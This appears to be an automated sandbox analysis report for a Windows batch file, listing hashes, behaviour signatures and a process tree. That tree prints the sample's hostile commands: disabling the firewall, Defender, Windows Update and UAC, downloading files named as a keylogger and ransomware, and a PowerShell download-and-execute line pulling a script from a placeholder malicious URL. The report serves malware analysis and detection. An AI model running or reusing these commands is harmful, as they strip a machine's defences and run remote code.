Resubmissions

25/05/2023, 14:44

230525-r3514aag52 10

25/05/2023, 14:42

230525-r27tasag47 8

25/05/2023, 14:33

230525-rw2p4abd4t 10

Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    25/05/2023, 14:33

General

  • Target

    Vewy dangerwous.bat

  • Size

    1KB

  • MD5

    8280240db4a4cc8555599df4f6416667

  • SHA1

    de4dd7d5e72af49039fae5b2457a8666a40054db

  • SHA256

    744ed50836579d0adac6df4943e921aa07e4637ab703bfcc1fabefbcf4957894

  • SHA512

    a709308d1a165e93d5275e220cd8a9cb07263021bfcee2ef9d2f70d9e813991916c1a7e7e83b0a9c1ff45f00ec0e8b3a1dbc7f4a8af5ff14fc05e68a2b87c603

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://malicious-url.com/malware.ps1

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Vewy dangerwous.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      2⤵
      • Modifies Windows Firewall
      PID:268
    • C:\Windows\system32\sc.exe
      sc config "WinDefend" start= disabled
      2⤵
      • Launches sc.exe
      PID:1880
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
      2⤵
      • UAC bypass
      PID:516
    • C:\Windows\system32\sc.exe
      sc config wuauserv start= disabled
      2⤵
      • Launches sc.exe
      PID:560
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
      2⤵
        PID:564
      • C:\Windows\system32\sc.exe
        sc config "wscsvc" start= disabled
        2⤵
        • Launches sc.exe
        PID:588
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest http://www.unforgettable.dk/42.zip -OutFile keylogger.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest http://www.unforgettable.dk/42.zip -OutFile ransomware.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1200
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$webClient = New-Object System.Net.WebClient; $webClient.DownloadString('http://malicious-url.com/malware.ps1') | iex"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:936
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "http://malicious-url.com/wallpaper.jpg" /f
        2⤵
        • Sets desktop wallpaper using registry
        PID:1944
      • C:\Windows\system32\rundll32.exe
        rundll32.exe user32.dll, UpdatePerUserSystemParameters
        2⤵
          PID:1492

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4T0DJIDOAGYVO96VD2DK.temp

              Filesize

              7KB

              MD5

              a54a047b5ed844984d37b9ca2bddc031

              SHA1

              616e9067505ccf482faa305b6d42feea3e8329d5

              SHA256

              261da525a052a3bffa902e733ec40219b4734e8dc8870a290a5cfd529f779292

              SHA512

              628608b6665c665aa35c54f2c9d3828f2c8895d466c59a6244f38c6681a6d20988ef994a6190dafee595cabe047cc91a841c1b5e25b25856eba8068394695140

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              a54a047b5ed844984d37b9ca2bddc031

              SHA1

              616e9067505ccf482faa305b6d42feea3e8329d5

              SHA256

              261da525a052a3bffa902e733ec40219b4734e8dc8870a290a5cfd529f779292

              SHA512

              628608b6665c665aa35c54f2c9d3828f2c8895d466c59a6244f38c6681a6d20988ef994a6190dafee595cabe047cc91a841c1b5e25b25856eba8068394695140

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              a54a047b5ed844984d37b9ca2bddc031

              SHA1

              616e9067505ccf482faa305b6d42feea3e8329d5

              SHA256

              261da525a052a3bffa902e733ec40219b4734e8dc8870a290a5cfd529f779292

              SHA512

              628608b6665c665aa35c54f2c9d3828f2c8895d466c59a6244f38c6681a6d20988ef994a6190dafee595cabe047cc91a841c1b5e25b25856eba8068394695140

            • memory/936-78-0x0000000002490000-0x0000000002510000-memory.dmp

              Filesize

              512KB

            • memory/936-76-0x0000000002490000-0x0000000002510000-memory.dmp

              Filesize

              512KB

            • memory/936-77-0x0000000002490000-0x0000000002510000-memory.dmp

              Filesize

              512KB

            • memory/1200-70-0x000000000251B000-0x0000000002552000-memory.dmp

              Filesize

              220KB

            • memory/1200-68-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

              Filesize

              32KB

            • memory/1200-69-0x0000000002514000-0x0000000002517000-memory.dmp

              Filesize

              12KB

            • memory/1200-67-0x000000001B160000-0x000000001B442000-memory.dmp

              Filesize

              2.9MB

            • memory/1732-58-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

              Filesize

              2.9MB

            • memory/1732-61-0x000000000287B000-0x00000000028B2000-memory.dmp

              Filesize

              220KB

            • memory/1732-60-0x0000000002874000-0x0000000002877000-memory.dmp

              Filesize

              12KB

            • memory/1732-59-0x0000000002360000-0x0000000002368000-memory.dmp

              Filesize

              32KB